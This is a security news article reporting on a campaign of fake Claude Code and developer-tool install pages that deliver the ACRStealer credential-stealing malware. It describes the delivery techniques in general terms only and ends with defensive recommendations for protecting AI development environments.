Fake Claude Code Installers Deliver Credential-Stealing Malware

Developers searching for Claude Code installation instructions may be walking into a sophisticated malware campaign that masquerades as legitimate AI tooling documentation.

Researchers found dozens of fake Claude Code and developer platform sites designed to steal credentials, API keys, and cryptocurrency.

“The attack chain runs on the same unchecked trust that makes AI developer tools so easy to adopt,” said Straiker researchers in their analysis of the campaign.

They added, “You copy a command. You paste it in your terminal. By then, it’s already too late.”

Key takeaways of the fake Claude Code campaign

• Researchers identified more than 88 fake domains impersonating Claude Code and other developer platforms.
• The campaign uses SEO poisoning and Google ads to place malicious install pages above legitimate documentation.
• Attackers hide malicious commands inside seemingly legitimate installation instructions, often without disrupting the expected installation process.
• The malware specifically targets AI-related assets, including API keys, authentication tokens, and cloud development credentials.

Inside the credential theft campaign

The campaign has targeted users of popular AI and developer tools, including Claude Code, Cline, JetBrains, Snowflake, and Perplexity Comet, since March 2026.

According to researchers, the operation relies on more than 88 domains hosted across trusted platforms and continuously rotates infrastructure, allowing malicious sites to quickly reappear after takedowns.

To lure victims, threat actors use SEO poisoning, redirect chains, and paid Google advertisements that place fraudulent installation pages above legitimate documentation in search results.  These sites closely mimic authentic vendor resources and present installation commands that appear legitimate but contain hidden separators, such as “&”, that execute malicious actions alongside the expected software installation.

In many cases, the legitimate command still runs successfully, helping conceal the compromise.

Malware delivery and execution techniques

Researchers observed a variety of delivery techniques, including rundll32.exe loading malicious DLLs, mshta.exe abuse, Base64-encoded commands, GitHub-hosted scripts, and JavaScript-based payloads.

By rotating these methods, attackers improve their ability to evade traditional detection tools.

Unlike typical infostealers, this campaign targets AI assets, including API keys, authentication tokens, and cloud development credentials, from tools such as Cline and Continue[.]dev.

Once executed, the malware deploys a multi-stage infection chain featuring encrypted C2 communications, fileless execution techniques, anti-analysis capabilities, and credential theft functionality.

Researchers identified the primary payload as ACRStealer, an information-stealing malware family that has evolved to incorporate advanced encryption and evasion mechanisms. The malware can steal AI credentials, browser passwords, password manager data, VPN credentials, cryptocurrency wallets, messaging app data, and sensitive files.

Researchers also found a cryptocurrency clipboard hijacker that redirects transactions by replacing copied wallet addresses.

Must-read security coverage

• UK Police Convicts Pair in £5.5 Billion Bitcoin Launder Case
• Blackpoint Cyber vs. Arctic Wolf: Which MDR Solution is Right for You?
• How GitHub Is Securing the Software Supply Chain
• 8 Best Enterprise Password Managers

Protecting AI development environments

Attacks like this often rely on trusted platforms, legitimate-looking documentation, and valid installation commands, so traditional security awareness training alone may not be enough to prevent compromise.

• Verify installation commands directly from official vendor documentation and train developers to inspect commands for suspicious operators before execution.
• Implement application control and endpoint detection tools to identify unauthorized scripts, fileless malware, and abuse of tools such as PowerShell.
• Enforce least-privilege access, use privileged access management tools, and phishing-resistant MFA to limit the impact of compromised developer credentials.
• Use centralized secrets management and continuous scanning to identify exposed API keys, authentication tokens, and other sensitive credentials across developer environments and repositories.
• Restrict unnecessary services, deploy DNS and web filtering controls, and monitor outbound network traffic for connections to suspicious or newly registered domains.
• Establish governance policies for approved AI development tools and provide developers with verified installation sources to reduce exposure to impersonation sites and malicious downloads.
• Test incident response plans and use attack-simulation tools with scenarios involving credential theft and supply chain compromise.

Collectively, these measures can help organizations reduce exposure to credential theft and malicious downloads.

Editor’s note: This article originally appeared on our sister publication, eSecurityPlanet.